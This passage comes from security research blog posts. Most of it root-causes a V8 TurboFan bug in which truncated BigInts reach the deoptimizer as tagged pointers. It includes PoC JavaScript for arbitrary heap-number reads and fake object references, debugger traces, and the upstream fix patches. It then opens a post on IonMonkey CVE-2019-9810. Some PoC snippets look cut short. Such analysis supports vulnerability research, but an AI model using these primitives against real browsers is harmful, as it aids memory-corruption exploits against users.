case kIdentifyZeros:
return "no-truncation (but identify zeros)";
case kDistinguishZeros:
return "no-truncation (but distinguish zeros)";
}
}
// ...
}


If we trace the first phase of simplified lowering (truncation propagation), we'll get the following output:

 visit #46: FrameState (trunc: no-truncation (but distinguish zeros))
queue #7?: no-truncation (but distinguish zeros)
initial #45: no-truncation (but distinguish zeros)
queue #71?: no-truncation (but distinguish zeros)
queue #4?: no-truncation (but distinguish zeros)
queue #62?: no-truncation (but distinguish zeros)
queue #0?: no-truncation (but distinguish zeros)


All the inputs are added to the queue, no truncation is ever propagated. The node #71 corresponds to the accumulator since it is the 3rd input.

 visit #71: BigIntAsUintN (trunc: no-truncation (but distinguish zeros))
queue #70?: no-value-use


In our example, the accumulator input is a BigIntAsUintN node. Such a node consumes an input which is a word64 and is truncated to a word64.

The astute reader will wonder what happens if this node returns a number that requires more than 64 bits. The answer lies in the inlining phase. Indeed, a JSCall to the BigInt.asUintN builtin will be reduced to a BigIntAsUintN TurboFan operator only when TurboFan is guaranteed that the requested width is at most 64 bits.

This node outputs a word64 and has BigInt as a restriction type. During the type propagation phase, any type computed for a given node will be intersected with its restriction type.

      case IrOpcode::kBigIntAsUintN: {
ProcessInput(node, 0, UseInfo::TruncatingWord64());
SetOutput(node, MachineRepresentation::kWord64, Type::BigInt());
return;
}


So at this point (after the propagation phase and before the lowering phase), if we focus on the FrameState node and its accumulator input node (input 2, i.e. the 3rd input), we can say the following:

• the FrameState expects MachineRepresentation::kNone for its input 2 (which accepts everything, including kWord64)
• the FrameState doesn't truncate its input 2
• the BigIntAsUintN output representation is kWord64

Because input 2 is used as Any (with a kNone representation), there won't ever be any conversion of the input node:

  // Converts input {index} of {node} according to given UseInfo {use},
// assuming the type of the input is {input_type}. If {input_type} is null,
// it takes the input from the input node {TypeOf(node->InputAt(index))}.
void ConvertInput(Node* node, int index, UseInfo use,
Type input_type = Type::Invalid()) {
Node* input = node->InputAt(index);
// In the change phase, insert a change before the use if necessary.
if (use.representation() == MachineRepresentation::kNone)
return;  // No input requirement on the use.


So what happens during the last phase of simplified lowering (the phase that lowers nodes and adds conversions)? If we look at the visitor of FrameState nodes, we can see that eventually the accumulator input may get replaced by a TypedStateValues node. The BigIntAsUintN node is now the input of the TypedStateValues node. No conversion of any kind is ever done.

  ZoneVector<MachineType>* types =
new (zone->New(sizeof(ZoneVector<MachineType>)))
ZoneVector<MachineType>(1, zone);
(*types)[0] = DeoptMachineTypeOf(GetInfo(accumulator)->representation(),
TypeOf(accumulator));

node->ReplaceInput(
2, jsgraph_->graph()->NewNode(jsgraph_->common()->TypedStateValues(
accumulator));


Also, the vector of MachineType is associated with the TypedStateValues node. To compute the machine type, DeoptMachineTypeOf relies on the node's type.

In that case (a BigIntAsUintN node), the type will be Type::BigInt().

Type OperationTyper::BigIntAsUintN(Type type) {
DCHECK(type.Is(Type::BigInt()));
return Type::BigInt();
}


Because for this node the output representation is kWord64 and the type is BigInt, DeoptMachineTypeOf returns MachineType::AnyTagged.

  static MachineType DeoptMachineTypeOf(MachineRepresentation rep, Type type) {
// ..
if (rep == MachineRepresentation::kWord64) {
if (type.Is(Type::BigInt())) {
return MachineType::AnyTagged();
}
// ...
}


So if we look at the sea of nodes right after the escape analysis phase and before the simplified lowering phase, it looks like this:

And after the simplified lowering phase, we can confirm that a TypedStateValues node was indeed inserted.

After effect control linearization, the BigIntAsUintN node gets lowered to a Word64And node.

As we learned earlier, the FrameState and TypedStateValues nodes do not directly correspond to any code generation.

void InstructionSelector::VisitNode(Node* node) {
switch (node->opcode()) {
// ...
case IrOpcode::kFrameState:
case IrOpcode::kStateValues:
case IrOpcode::kObjectState:
return;
// ...


However, other nodes may make use of FrameState and TypedStateValues nodes. This is the case for instance of the various Deoptimize nodes and also Call nodes.

They will make the instruction selector build the necessary FrameStateDescriptor and StateValueList of StateValueDescriptor.

Using those structures, the code generator will then build the necessary DeoptimizationExits, each of which has an associated Translation. The function BuildTranslation will handle the InstructionOperands in CodeGenerator::AddTranslationForOperand. And this is where the (AnyTagged) MachineType corresponding to the BigIntAsUintN node is used! When building the translation, we are using the BigInt value as if it was a pointer (second branch) and not a double value (first branch)!

void CodeGenerator::AddTranslationForOperand(Translation* translation,
                                             Instruction* instr,
                                             InstructionOperand* op,
                                             MachineType type) {
  // ...
      case Constant::kInt64:
        DCHECK_EQ(8, kSystemPointerSize);
        if (type.representation() == MachineRepresentation::kWord64) {
          literal =
              DeoptimizationLiteral(static_cast<double>(constant.ToInt64()));
        } else {
          // When pointers are 8 bytes, we can use int64 constants to represent
          // Smis.
          DCHECK_EQ(MachineRepresentation::kTagged, type.representation());
          Smi smi(static_cast<Address>(constant.ToInt64()));
          DCHECK(smi.IsSmi());
          literal = DeoptimizationLiteral(smi.value());
        }
        break;
  // ...


This is very interesting because that means at runtime (when deoptimizing), the deoptimizer uses this pointer to rematerialize an object! But since this is a controlled value (the truncated big int), we can make the deoptimizer reference an arbitrary object and thus make the next ignition bytecode handler use (or not) this crafted reference.
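
To make "using the value as if it was a pointer" concrete, here is a toy model of how a 64-bit tagged word is interpreted on a build without pointer compression: the lowest bit separates Smis from heap object pointers. This is not V8 code; describeTagged is a hypothetical helper, and the two sample words are the BigInt value and the HeapNumber address that show up in the experiments of this article.

```javascript
// Toy model of a 64-bit tagged word (no pointer compression). Not V8 code.
function describeTagged(word) {
  if ((word & 1n) === 0n) {
    // Low bit clear: a Smi whose 32-bit payload sits in the upper half.
    return { kind: "smi", value: Number(BigInt.asIntN(32, word >> 32n)) };
  }
  // Low bit set: a heap object pointer; tag 01 is strong, tag 11 is weak.
  const weak = (word & 3n) === 3n;
  return { kind: weak ? "weak" : "strong", address: word & ~3n };
}

// A truncated BigInt whose raw bits look like a Smi.
const asSmi = describeTagged(0x004200000000n);

// A truncated BigInt whose raw bits look like a tagged heap pointer.
const asPointer = describeTagged(0x019d1cb1f631n);

console.log(asSmi, asPointer.kind, asPointer.address.toString(16));
```

Under these assumptions, whoever controls the 64 bits of the truncated BigInt decides whether the next bytecode handler sees a small integer or a reference to some address.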

In this case, we are playing with the accumulator register. Therefore, to find interesting primitives, what we need to do is to look for all the bytecode handlers that get the accumulator (using a GetAccumulator for instance).

Experiment 1 - reading an arbitrary heap number

The most obvious primitive is the one we get by deoptimizing to the ignition handler for add opcodes.

let addr = BigInt(0x11111111);

}

function f(x) {
let a = 111;
try {
var res = 1.1 + y; // will trigger a deoptimization. reason : "Insufficient type feedback for binary operation"
return res;
}
catch(_){ return y}
}

function compileOnce() {
f({x:1.1});
%PrepareFunctionForOptimization(f);
f({x:1.1});
%OptimizeFunctionOnNextCall(f);
return f({x:1.1});
}


When reading the implementation of the handler (BinaryOpAssembler::Generate_AddWithFeedback in src/ic/bin-op-assembler.cc), we observe that for heap number additions, the code ends up calling the function LoadHeapNumberValue. In that case, it gets called with an arbitrary pointer.
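
The effect of loading a heap number value through an attacker-chosen pointer can be sketched with a toy heap. Everything below is an assumption made for illustration: the 16-byte layout (one 8-byte map word followed by an 8-byte IEEE 754 payload), the offset constant and the function name only mimic the idea and are not V8's definitions.

```javascript
// Toy heap holding one fake HeapNumber: [8-byte map word][8-byte float64].
const heap = new DataView(new ArrayBuffer(16));
const kValueOffset = 8; // assumed offset of the payload in this toy layout
heap.setFloat64(kValueOffset, 3.14, true);

// Mimics a heap number load: untag, add the field offset, read a double.
function loadHeapNumberValue(taggedPointer) {
  const address = taggedPointer - 1; // strip the heap object tag bit
  return heap.getFloat64(address + kValueOffset, true);
}

// Toy "pointer" to offset 0 of the heap, tagged with the low bit set.
const fakeTagged = 0 + 1;
const leaked = loadHeapNumberValue(fakeTagged);

// The add handler then simply uses that double as its operand.
console.log(leaked, 1.1 + leaked);
```

The load never checks what the pointer refers to, so any 8 bytes at the right offset are happily interpreted as a double.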

To demonstrate the bug, we use the %DebugPrint runtime function to get the address of an object (simulate an infoleak primitive) and see that we indeed (incorrectly) read its value.

d8> var a = new Number(3.14); %DebugPrint(a)
0x025f585caa49 <Number map = 000000FB210820A1 value = 0x019d1cb1f631 <HeapNumber 3.14>>
3.14
undefined
d8> compileOnce()
4.24


We can get the same primitive using other kinds of Ignition bytecode handlers, such as the ones for -, /, * or %.

--- var res = 1.1 + y;
+++ var res = y / 1;

d8> var a = new Number(3.14); %DebugPrint(a)
0x019ca5a8aa11 <Number map = 00000138F15420A1 value = 0x0168e8ddf611 <HeapNumber 3.14>>
3.14
undefined
d8> compileOnce()
3.14


The --trace-ignition debugging utility can be interesting in this scenario. For instance, let's say we use a BigInt value of 0x4200000000 and instead of doing 1.1 + y we do y / 1. Then we want to trace it and confirm the behaviour that we expect.

The trace tells us :

• a deoptimization was triggered and why (insufficient type feedback for binary operation, this binary operation being the division)
• in the input frame, there is a register entry containing the bigint value thanks to (or because of) the incorrect lowering 11: 0x004200000000 ; rcx 66
• in the translated interpreted frame the accumulator gets the value 0x004200000000 (<Smi 66>)
• we deoptimize directly to the offset 39 which corresponds to DivSmi [1], [6]
[deoptimizing (DEOPT soft): begin 0x01b141c5f5f1 <JSFunction f (sfi = 000001B141C5F299)> (opt #0) @3, FP to SP delta: 40, caller sp: 0x0042f87fde08]
;;; deoptimize at <read_heap_number.js:11:17>, Insufficient type feedback for binary operation
reading input frame f => bytecode_offset=39, args=2, height=8, retval=0(#0); inputs:
0: 0x01b141c5f5f1 ;  [fp -  16]  0x01b141c5f5f1 <JSFunction f (sfi = 000001B141C5F299)>
1: 0x03a35e2c1349 ;  [fp +  24]  0x03a35e2c1349 <JSGlobal Object>
2: 0x03a35e2cb3b1 ;  [fp +  16]  0x03a35e2cb3b1 <Object map = 0000019FAF409DF1>
3: 0x01b141c5f551 ;  [fp -  24]  0x01b141c5f551 <ScriptContext[5]>
4: 0x03a35e2cb3d1 ; rdi 0x03a35e2cb3d1 <BigInt 283467841536>
5: 0x00422b840df1 ; (literal  2) 0x00422b840df1 <Odd Oddball: optimized_out>
6: 0x00422b840df1 ; (literal  2) 0x00422b840df1 <Odd Oddball: optimized_out>
7: 0x01b141c5f551 ;  [fp -  24]  0x01b141c5f551 <ScriptContext[5]>
8: 0x00422b840df1 ; (literal  2) 0x00422b840df1 <Odd Oddball: optimized_out>
9: 0x00422b840df1 ; (literal  2) 0x00422b840df1 <Odd Oddball: optimized_out>
10: 0x00422b840df1 ; (literal  2) 0x00422b840df1 <Odd Oddball: optimized_out>
11: 0x004200000000 ; rcx 66
translating interpreted frame f => bytecode_offset=39, height=64
0x0042f87fde00: [top + 120] <- 0x03a35e2c1349 <JSGlobal Object> ;  stack parameter (input #1)
0x0042f87fddf8: [top + 112] <- 0x03a35e2cb3b1 <Object map = 0000019FAF409DF1> ;  stack parameter (input #2)
-------------------------
0x0042f87fddf0: [top + 104] <- 0x7ffd93f64c1d ;  caller's pc
0x0042f87fdde8: [top +  96] <- 0x0042f87fde38 ;  caller's fp
0x0042f87fdde0: [top +  88] <- 0x01b141c5f551 <ScriptContext[5]> ;  context (input #3)
0x0042f87fddd8: [top +  80] <- 0x01b141c5f5f1 <JSFunction f (sfi = 000001B141C5F299)> ;  function (input #0)
0x0042f87fddd0: [top +  72] <- 0x01b141c5fa41 <BytecodeArray[61]> ;  bytecode array
0x0042f87fddc8: [top +  64] <- 0x005c00000000 <Smi 92> ;  bytecode offset
-------------------------
0x0042f87fddc0: [top +  56] <- 0x03a35e2cb3d1 <BigInt 283467841536> ;  stack parameter (input #4)
0x0042f87fddb8: [top +  48] <- 0x00422b840df1 <Odd Oddball: optimized_out> ;  stack parameter (input #5)
0x0042f87fddb0: [top +  40] <- 0x00422b840df1 <Odd Oddball: optimized_out> ;  stack parameter (input #6)
0x0042f87fdda8: [top +  32] <- 0x01b141c5f551 <ScriptContext[5]> ;  stack parameter (input #7)
0x0042f87fdda0: [top +  24] <- 0x00422b840df1 <Odd Oddball: optimized_out> ;  stack parameter (input #8)
0x0042f87fdd98: [top +  16] <- 0x00422b840df1 <Odd Oddball: optimized_out> ;  stack parameter (input #9)
0x0042f87fdd90: [top +   8] <- 0x00422b840df1 <Odd Oddball: optimized_out> ;  stack parameter (input #10)
0x0042f87fdd88: [top +   0] <- 0x004200000000 <Smi 66> ;  accumulator (input #11)
[deoptimizing (soft): end 0x01b141c5f5f1 <JSFunction f (sfi = 000001B141C5F299)> @3 => node=39, pc=0x7ffd93f65100, caller sp=0x0042f87fde08, took 2.328 ms]
-> 000001B141C5FA9D @   39 : 43 01 06          DivSmi [1], [6]
[ accumulator -> 66 ]
[ accumulator <- 66 ]
-> 000001B141C5FAA0 @   42 : 26 f9             Star r2
[ accumulator -> 66 ]
[          r2 <- 66 ]
-> 000001B141C5FAA2 @   44 : a9                Return
[ accumulator -> 66 ]
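
One detail of this trace can look confusing: the deoptimizer reports bytecode_offset=39 while the frame slot labelled "bytecode offset" holds <Smi 92>. The arithmetic below only uses addresses taken from the trace and suggests that the slot stores the distance between the tagged BytecodeArray pointer and the current bytecode. Reading the remaining 53 bytes as the BytecodeArray header (minus the tag) is our interpretation, not something the trace states.

```javascript
// All three constants are copied from the trace above.
const bytecodeArrayTagged = 0x01b141c5fa41n; // <BytecodeArray[61]>
const divSmiAddress = 0x01b141c5fa9dn;       // "-> 000001B141C5FA9D @ 39"
const frameSlot = 0x005c00000000n;           // "<Smi 92> ; bytecode offset"

// The frame slot is a Smi: its payload is in the upper 32 bits.
const slotAsSmi = frameSlot >> 32n;

// Distance between the tagged array pointer and the DivSmi bytecode.
const distance = divSmiAddress - bytecodeArrayTagged;

// What is left once the logical bytecode offset (39) is removed.
const headerDelta = distance - 39n;

console.log(slotAsSmi, distance, headerDelta);
```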


Experiment 2 - getting an arbitrary object reference

This bug also gives a better, more powerful primitive. Indeed, if instead of deoptimizing back to an add handler, we deoptimize to Builtins_StaKeyedPropertyHandler, we'll be able to store an arbitrary object reference in an object property. Therefore, an attacker who is also able to leverage an infoleak primitive would be able to craft any arbitrary object (these are sometimes referred to as addressof and fakeobj primitives).

In order to deoptimize to this specific handler, aka deoptimize on obj[x] = y, we have to make this line do something that violates a speculation. If we repeatedly call the function f with the same property name, TurboFan will speculate that we're always gonna add the same property. Once the code is optimized, using a property with a different name will violate this assumption, call the deoptimizer and then redirect execution to the StaKeyedProperty handler.

let addr = BigInt(0x11111111);

}

function f(x) {
let a = 111;
try {
var obj = {};
obj[x] = y;
return obj;
}
catch(_){ return y}
}

function compileOnce() {
f("foo");
%PrepareFunctionForOptimization(f);
f("foo");
f("foo");
f("foo");
f("foo");
%OptimizeFunctionOnNextCall(f);
f("foo");
return f("boom"); // deopt reason : wrong name
}


To experiment, we simulate the infoleak primitive with the %DebugPrint runtime function and add an ArrayBuffer to the object. That should not be possible since the JavaScript code is actually adding a truncated BigInt.

d8> var a = new ArrayBuffer(8); %DebugPrint(a);
0x003d5ef8ab79 <ArrayBuffer map = 00000354B09C2191>
[object ArrayBuffer]
undefined
undefined
0x003d5ef8d159 <Object map = 00000354B09C9F81>
{boom: [object ArrayBuffer]}
[object ArrayBuffer]


Et voila! Sweet as!

Variants

We saw with the first commit that the pattern affected FrameState nodes but also StateValues nodes.

Another commit further fixed the exact same bug affecting ObjectState nodes.

From 3ce6be027562ff6641977d7c9caa530c74a279ac Mon Sep 17 00:00:00 2001
From: Nico Hartmann <[email protected]>
Date: Tue, 26 Nov 2019 13:17:45 +0100
Subject: [PATCH] [turbofan] Fixes crash caused by truncated bigint

Bug: chromium:1028191
Change-Id: Idfcd678b3826fb6238d10f1e4195b02be35c3010
Commit-Queue: Nico Hartmann <[email protected]>
Reviewed-by: Georg Neis <[email protected]>
---

diff --git a/src/compiler/simplified-lowering.cc b/src/compiler/simplified-lowering.cc
index 4c000af..f271469 100644
--- a/src/compiler/simplified-lowering.cc
+++ b/src/compiler/simplified-lowering.cc
@@ -1254,7 +1254,13 @@
void VisitObjectState(Node* node) {
if (propagate()) {
for (int i = 0; i < node->InputCount(); i++) {
-        EnqueueInput(node, i, UseInfo::Any());
+        // TODO(nicohartmann): Remove, once the deoptimizer can rematerialize
+        // truncated BigInts.
+        if (TypeOf(node->InputAt(i)).Is(Type::BigInt())) {
+          EnqueueInput(node, i, UseInfo::AnyTagged());
+        } else {
+          EnqueueInput(node, i, UseInfo::Any());
+        }
}
} else if (lower()) {
Zone* zone = jsgraph_->zone();
@@ -1265,6 +1271,11 @@
Node* input = node->InputAt(i);
(*types)[i] =
DeoptMachineTypeOf(GetInfo(input)->representation(), TypeOf(input));
+        // TODO(nicohartmann): Remove, once the deoptimizer can rematerialize
+        // truncated BigInts.
+        if (TypeOf(node->InputAt(i)).Is(Type::BigInt())) {
+          ConvertInput(node, i, UseInfo::AnyTagged());
+        }
}
NodeProperties::ChangeOp(node, jsgraph_->common()->TypedObjectState(
ObjectIdOf(node->op()), types));
diff --git a/test/mjsunit/regress/regress-1028191.js b/test/mjsunit/regress/regress-1028191.js
new file mode 100644
index 0000000..543028a
--- /dev/null
+++ b/test/mjsunit/regress/regress-1028191.js
@@ -0,0 +1,23 @@
+// Use of this source code is governed by a BSD-style license that can be
+// found in the LICENSE file.
+
+// Flags: --allow-natives-syntax
+
+"use strict";
+
+function f(a, b, c) {
+  let x = BigInt.asUintN(64, a + b);
+  try {
+    x + c;
+  } catch(_) {
+    eval();
+  }
+  return x;
+}
+
+%PrepareFunctionForOptimization(f);
+assertEquals(f(3n, 5n), 8n);
+assertEquals(f(8n, 12n), 20n);
+%OptimizeFunctionOnNextCall(f);
+assertEquals(f(2n, 3n), 5n);


Interestingly, other bugs in the representation changer got triggered by very similar PoCs. The fix simply adds a call to InsertConversion so as to insert a ChangeUint64ToBigInt node when necessary.

From 8aa588976a1c4e593f0074332f5b1f7020656350 Mon Sep 17 00:00:00 2001
From: Nico Hartmann <[email protected]>
Date: Thu, 12 Dec 2019 10:06:19 +0100
Subject: [PATCH] [turbofan] Fixes rematerialization of truncated BigInts

Bug: chromium:1029530
Change-Id: I12aa4c238387f6a47bf149fd1a136ea83c385f4b
Auto-Submit: Nico Hartmann <[email protected]>
Commit-Queue: Georg Neis <[email protected]>
Reviewed-by: Georg Neis <[email protected]>
---

diff --git a/src/compiler/representation-change.cc b/src/compiler/representation-change.cc
index 99b3d64..9478e15 100644
--- a/src/compiler/representation-change.cc
+++ b/src/compiler/representation-change.cc
@@ -175,6 +175,15 @@
}
}

+  // Rematerialize any truncated BigInt if user is not expecting a BigInt.
+  if (output_type.Is(Type::BigInt()) &&
+      output_rep == MachineRepresentation::kWord64 &&
+      use_info.type_check() != TypeCheckKind::kBigInt) {
+    node =
+        InsertConversion(node, simplified()->ChangeUint64ToBigInt(), use_node);
+    output_rep = MachineRepresentation::kTaggedPointer;
+  }
+
switch (use_info.representation()) {
case MachineRepresentation::kTaggedSigned:
DCHECK(use_info.type_check() == TypeCheckKind::kNone ||
diff --git a/test/mjsunit/regress/regress-1029530.js b/test/mjsunit/regress/regress-1029530.js
new file mode 100644
index 0000000..918a9ec
--- /dev/null
+++ b/test/mjsunit/regress/regress-1029530.js
@@ -0,0 +1,40 @@
+// Use of this source code is governed by a BSD-style license that can be
+// found in the LICENSE file.
+
+// Flags: --allow-natives-syntax --interrupt-budget=1024
+
+{
+  function f() {
+    const b = BigInt.asUintN(4,3n);
+    let i = 0;
+    while(i < 1) {
+      i + 1;
+      i = b;
+    }
+  }
+
+  %PrepareFunctionForOptimization(f);
+  f();
+  f();
+  %OptimizeFunctionOnNextCall(f);
+  f();
+}
+
+
+{
+  function f() {
+    const b = BigInt.asUintN(4,10n);
+    let i = 0.1;
+    while(i < 1.8) {
+      i + 1;
+      i = b;
+    }
+  }
+
+  %PrepareFunctionForOptimization(f);
+  f();
+  f();
+  %OptimizeFunctionOnNextCall(f);
+  f();
+}


An inlining bug was also patched. Indeed, a call to BigInt.asUintN would get inlined even when no value argument is given (as in BigInt.asUintN(bits,no_value_argument_here)). Therefore a call to GetValueInput would be made on a non-existing input! The fix simply adds a check on the number of inputs.

Node* value = NodeProperties::GetValueInput(node, 3); // input 3 may not exist!


An interesting fact to point out is that none of those PoCs would actually correctly execute. They would trigger exceptions that need to get caught. This leads to interesting behaviours from TurboFan that optimizes 'invalid' code.
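
The exceptions in question are ordinary language-level TypeErrors, which is why every PoC wraps the interesting statement in a try/catch. The snippet below reproduces them in plain JavaScript, without any V8 flag; errorNameOf is a small helper written for this illustration.

```javascript
// Returns the name of the error thrown by fn, or null if fn returns normally.
function errorNameOf(fn) {
  try {
    fn();
    return null;
  } catch (e) {
    return e.name;
  }
}

// Mixing a Number and a BigInt, as in `1.1 + y`.
const mixed = errorNameOf(() => 1.1 + 5n);

// Omitting the value argument, as in the inlining bug.
const missing = errorNameOf(() => BigInt.asUintN(64));

// Adding undefined to a BigInt, as in `x + c` when c is not passed.
const undef = errorNameOf(() => 8n + undefined);

// A well-formed call does not throw.
const fine = errorNameOf(() => BigInt.asUintN(64, 3n + 5n));

console.log(mixed, missing, undef, fine);
```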

Digression on pointer compression

In our small experiments, we used standard tagged pointers. To distinguish small integers (Smis) from heap objects, V8 uses the lowest bit of an object address.

Up until V8 8.0, it looks like this :

Smi:                   [32 bits] [31 bits (unused)]  |  0
Strong HeapObject:                        [pointer]  | 01
Weak HeapObject:                          [pointer]  | 11


However, with V8 8.0 comes pointer compression. It is going to be shipped with the upcoming M80 stable release. Starting from this version, Smis and compressed pointers are stored as 32-bit values :

Smi:                                      [31 bits]  |  0
Strong HeapObject:                        [30 bits]  | 01
Weak HeapObject:                          [30 bits]  | 11


As described in the design document, a compressed pointer corresponds to the lower 32 bits of a pointer, to which we add a base address when decompressing.

Let's quickly have a look by inspecting the memory ourselves. Note that DebugPrint displays uncompressed pointers.

d8> var a = new Array(1,2,3,4)
undefined
d8> %DebugPrint(a)
DebugPrint: 0x16a4080c5f61: [JSArray]
- map: 0x16a4082817e9 <Map(PACKED_SMI_ELEMENTS)> [FastProperties]
- prototype: 0x16a408248f25 <JSArray[0]>
- elements: 0x16a4080c5f71 <FixedArray[4]> [PACKED_SMI_ELEMENTS]
- length: 4
- properties: 0x16a4080406e1 <FixedArray[0]> {
#length: 0x16a4081c015d <AccessorInfo> (const accessor descriptor)
}
- elements: 0x16a4080c5f71 <FixedArray[4]> {
0: 1
1: 2
2: 3
3: 4
}


If we look in memory, we'll actually find compressed pointers, which are 32-bit values.

(lldb) x/10wx 0x16a4080c5f61-1
0x16a4080c5f60: 0x082817e9 0x080406e1 0x080c5f71 0x00000008
0x16a4080c5f70: 0x080404a9 0x00000008 0x00000002 0x00000004
0x16a4080c5f80: 0x00000006 0x00000008
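
The words of this dump can be decoded with the compressed layout given earlier. The sketch below is only a reading aid: classifyCompressed is a hypothetical helper, and the field names given to the first four words follow the DebugPrint output above (map, properties, elements, length).

```javascript
// Classifies a 32-bit compressed word: Smi, strong pointer or weak pointer.
function classifyCompressed(word) {
  if ((word & 1) === 0) {
    // Low bit clear: a Smi with a 31-bit payload, so shift right by one.
    return { kind: "smi", value: word >> 1 };
  }
  // Low bit set: heap object; tag 01 is strong, tag 11 is weak.
  const kind = (word & 3) === 3 ? "weak" : "strong";
  return { kind, offset: (word & ~3) >>> 0 };
}

// First row of the dump: the JSArray header.
const header = [0x082817e9, 0x080406e1, 0x080c5f71, 0x00000008];
const [map, properties, elements, length] = header.map(classifyCompressed);

// Last four words of the dump: the array items, stored as Smis.
const items = [0x00000002, 0x00000004, 0x00000006, 0x00000008]
  .map((w) => classifyCompressed(w).value);

console.log(map.kind, elements.offset.toString(16), length.value, items);
```

The length decodes to 4 and the items to 1, 2, 3, 4, which matches the array that was created.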


To get the full address, we need to know the base.

(lldb) register read r13
r13 = 0x000016a400000000
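
With the base known, decompression is a single addition. The sketch below redoes the computation with BigInt arithmetic, using the base read from r13 and the compressed elements pointer from the dump; decompress and untag are illustrative names, and real builds may compute this differently.

```javascript
// Base address, as read from r13 in the lldb session.
const base = 0x16a400000000n;

// Decompress: add the 32-bit compressed value to the base.
function decompress(compressed) {
  return base + BigInt(compressed >>> 0);
}

// Untag: clear the heap object tag by subtracting one.
function untag(tagged) {
  return tagged - 1n;
}

const elementsTagged = decompress(0x080c5f71);
const elementsAddress = untag(elementsTagged);

console.log(elementsTagged.toString(16), elementsAddress.toString(16));
```

The tagged result is the elements pointer that %DebugPrint displayed for the array.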


And we can manually uncompress a pointer by doing base+compressed_pointer (and obviously we subtract 1 to untag the pointer).

(lldb) x/10wx r13+0x080c5f71-1
0x16a4080c5f70: 0x080404a9 0x00000008 0x00000002 0x00000004
0x16a4080c5f80: 0x00000006 0x00000008 0x08040549 0x39dc599e
0x16a4080c5f90: 0x00000adc 0x7566280a


Because now on a 64-bit build Smis are on 32-bits with the lsb set to 0, we need to shift their values by one.

Also, raw pointers are supported. An example of raw pointer is the backing store pointer of an array buffer.

d8> var a = new ArrayBuffer(0x40);
d8> var v = new Uint32Array(a);
d8> v[0] = 0x41414141


d8> %DebugPrint(a)
DebugPrint: 0x16a4080c7899: [JSArrayBuffer]
- map: 0x16a408281181 <Map(HOLEY_ELEMENTS)> [FastProperties]
- prototype: 0x16a4082476f5 <Object map = 0x16a4082811a9>
- elements: 0x16a4080406e1 <FixedArray[0]> [HOLEY_ELEMENTS]
- embedder fields: 2
- backing_store: 0x107314fd0
- byte_length: 64
- detachable
- properties: 0x16a4080406e1 <FixedArray[0]> {}
- embedder fields = {
0, aligned pointer: 0x0
0, aligned pointer: 0x0
}


(lldb) x/10wx 0x16a4080c7899-1
0x16a4080c7898: 0x08281181 0x080406e1 0x080406e1 0x00000040
0x16a4080c78a8: 0x00000000 0x07314fd0 0x00000001 0x00000002
0x16a4080c78b8: 0x00000000 0x00000000


We indeed find the full raw pointer in memory (raw | 00).

(lldb) x/2wx 0x0000000107314fd0
0x107314fd0: 0x41414141 0x00000000


Conclusion

We went through various components of V8 in this article such as Ignition, TurboFan's simplified lowering phase as well as how deoptimization works. Understanding this is interesting because it allows us to grasp the actual underlying root cause of the bug we studied. At first, the base trigger looks very simple but it actually involves quite a few interesting mechanisms.

However, even though this bug gives a very interesting primitive, unfortunately it does not provide any good infoleak primitive. Therefore, it would need to be combined with another bug (obviously, we don't want to use any kind of heap spraying).

Special thanks to my mates Axel Souchet, Dougall J, Bill K, yrp604 and Mark Dowd for reviewing this article and kudos to the V8 team for building such an amazing JavaScript engine!

Please feel free to contact me on twitter if you've got any feedback or question! Also, my team at Trenchant aka Azimuth Security is hiring so don't hesitate to reach out if you're interested :) (DMs are open, otherwise jf at company dot com with company being azimuthsecurity)

References

Technical documents

Bugs

A journey into IonMonkey: root-causing CVE-2019-9810.

17 June 2019 at 15:00

Introduction

In May, I wanted to play with BigInt and evaluate how I could use them for browser exploitation. The exploit I wrote for the blazefox relied on a Javascript library developed by @5aelo that allows code to manipulate 64-bit integers. Around the same time ZDI had released a PoC for CVE-2019-9810 which is an issue in IonMonkey (Mozilla's speculative JIT engine) that was discovered and used by the magicians Richard Zhu and Amat Cama during Pwn2Own2019 for compromising Mozilla's web-browser.

This was the perfect occasion to write an exploit and add BigInt support in my utility script. You can find the actual exploit on my github in the following repository: CVE-2019-9810.

Once I was done with it, I felt that it was also a great occasion to dive into Ion and get to know each other. The original exploit was written without understanding one bit of the root-cause of the issue and unwinding this sounded like a nice exercise. This is basically what this blogpost is about, me exploring Ion's code-base and investigating the root-cause of CVE-2019-9810.

The title of the issue "IonMonkey MArraySlice has incorrect alias information" seems to suggest that the root of the issue concerns some alias information and the fix of the issue also points at Ion's AliasAnalysis optimization pass.

Before starting, if you guys want to follow the source-code at home without downloading the whole of Spidermonkey’s / Firefox’s source-code I have set-up the woboq code browser on an S3 bucket here: ff-woboq - just remember that the snapshot has the fix for the issue we are discussing. Last but not least, I've noticed that IonMonkey gets decent code-churn and as a result some of the functions I mention below can appear with a slightly different name on the latest available version.

All right, buckle up and enjoy the read!

Speculative optimizing JIT compiler

This part is not really meant to introduce what optimizing speculative JIT engines are in detail but instead to give you an idea of the problem they are trying to solve. On top of that, we want to introduce some background knowledge about Ion specifically that is required to be able to follow what is to come.

For the people that never heard about JIT (just-in-time) engines, this is a piece of software that is able to turn managed code into native code as it runs. This has been historically used by interpreted languages to produce faster code as running assembly is faster than a software CPU running code. With that in mind, this is what the Javascript bytecode looks like in Spidermonkey:

js> function f(a, b) { return a+b; }
js> dis(f)
flags: CONSTRUCTOR
loc     op
-----   --
main:
00000:  getarg 0                        #
00003:  getarg 1                        #
00006:  add                             #
00007:  return                          #
00008:  retrval                         # !!! UNREACHABLE !!!

Source notes:
 ofs line    pc  delta desc     args
---- ---- ----- ------ -------- ------
  0:    1     0 [   0] colspan 19
  2:    1     0 [   0] step-sep
  3:    1     0 [   0] breakpoint
  4:    1     7 [   7] colspan 12
  6:    1     8 [   1] breakpoint


Now, generating assembly is one thing but the JIT engine can be more advanced and apply a bunch of program analysis to optimize the code even more. Imagine a loop that sums every item in an array and does nothing else.
Well, the JIT engine might be able to prove that it is safe to not do any bounds check on the index in which case it can remove it. Another easy example to reason about is an object getting constructed in a loop body that doesn't depend on the loop itself at all. If the JIT engine can prove that the statement is actually an invariant, then why construct it for every run of the loop body? In that case it makes sense for the optimizer to move the statement out of the loop to avoid the useless constructions. This is the optimized assembly generated by Ion for the same function as above:

0:000> u . l20
000003add5d09231 cc                    int 3
000003add5d09232 8b442428              mov eax,dword ptr [rsp+28h]
000003add5d09236 8b4c2430              mov ecx,dword ptr [rsp+30h]
000003add5d0923a 03c1                  add eax,ecx
000003add5d0923c 0f802f000000          jo 000003add5d09271
000003add5d09242 48b9000000000080f8ff  mov rcx,0FFF8800000000000h
000003add5d0924c 480bc8                or rcx,rax
000003add5d0924f c3                    ret
000003add5d09271 2bc1                  sub eax,ecx
000003add5d09273 e900000000            jmp 000003add5d09278
